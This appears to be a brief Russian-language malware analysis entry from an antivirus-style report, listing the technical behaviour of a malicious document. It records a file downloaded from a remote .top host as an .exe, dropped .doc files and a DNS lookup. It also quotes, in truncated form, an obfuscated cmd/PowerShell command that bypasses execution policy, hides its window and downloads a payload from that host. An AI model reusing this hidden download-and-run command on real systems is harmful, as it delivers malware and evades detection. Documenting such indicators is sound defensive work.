Техническая информация
- http://truepokemonant.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWEr^sH^E^Ll.EX^e^ -ExEcuT^IoNpoL^i^CY^ bypa^Ss ^-n^opr^O^fi^L^e -W^i^ndOWs^t^yL^e^ H^I^dd^EN (Ne^W^-^objECt^ ^sYsT^E^M^.Net.wEbcl^ie^NT^).D^O^W^n^LOaDfiL^e(^'http://truepoke...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\word\<Имя файла>.doc
- DNS ASK tr####kemonant.top
- '<SYSTEM32>\cmd.exe' /C "POWEr^sH^E^Ll.EX^e^ -ExEcuT^IoNpoL^i^CY^ bypa^Ss ^-n^opr^O^fi^L^e -W^i^ndOWs^t^yL^e^ H^I^dd^EN (Ne^W^-^objECt^ ^sYsT^E^M^.Net.wEbcl^ie^NT^).D^O^W^n^LOaDfiL^e(^'http://truepoke...' (со скрытым окном)